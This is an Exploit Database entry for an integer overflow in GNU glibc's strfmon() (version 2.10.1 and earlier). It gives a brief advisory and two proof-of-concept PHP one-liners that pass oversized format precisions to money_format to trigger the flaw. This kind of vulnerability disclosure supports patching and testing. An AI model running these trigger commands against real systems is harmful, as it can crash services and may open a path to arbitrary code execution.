GNU glibc 2.x - 'strfmon()' Integer Overflow

EDB-ID:

33230




Platform:

Linux

Date:

2009-09-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/36443/info

GNU glibc is prone to an integer-overflow weakness.

An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

GNU glibc 2.10.1 and prior are vulnerable. 

The following proof-of-concept commands are available:

php -r 'money_format("%.1073741821i",1);'
php -r 'money_format("%.1343741821i",1);'